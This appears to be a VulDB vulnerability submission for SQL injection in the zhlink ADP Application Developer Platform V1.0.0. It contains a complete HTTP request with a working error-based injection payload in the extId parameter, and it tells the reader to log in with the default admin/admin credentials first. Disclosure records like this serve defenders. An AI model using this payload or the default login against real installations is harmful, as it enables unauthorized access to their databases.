| Title | 智互联(深圳)科技有限公司 ADP Application Developer Platform zhlink V1.0.0 SQL Injection |
|---|
| Description | Vulnerable URL: x.x.x.x:8083/adpweb/a/login
GET /adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 HTTP/1.1
Host: x.x.x.x:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=5F82478A113439530681B398B1596D9C; zhilink.session.id=2efebc93c5ec4946af83e7d1c81a1bd7; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1705660638; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1705660673
Referer: http://x.x.x.x:8083/adpweb/a/tag/treeselect?url=%2Fsys%2Foffice%2FtreeData%3Ftype%3D1%26companyid%3D&module=&checked=&extId=&isAll=
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
Injection point parameter: extId
Log in with the default credentials admin/admin, then test the injection.
payload: /adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 |
|---|
| Source | ⚠️ http://x.x.x.x:8083/adpweb/a/login |
|---|
| User | Id3al (UID 85503) |
|---|
| Submission | 2025. 07. 31. AM 11:03 (9 months ago) |
|---|
| Moderation | 2025. 08. 09. AM 09:46 (9 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 319335 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 treeData SQL injection] |
|---|
| Points | 20 |
|---|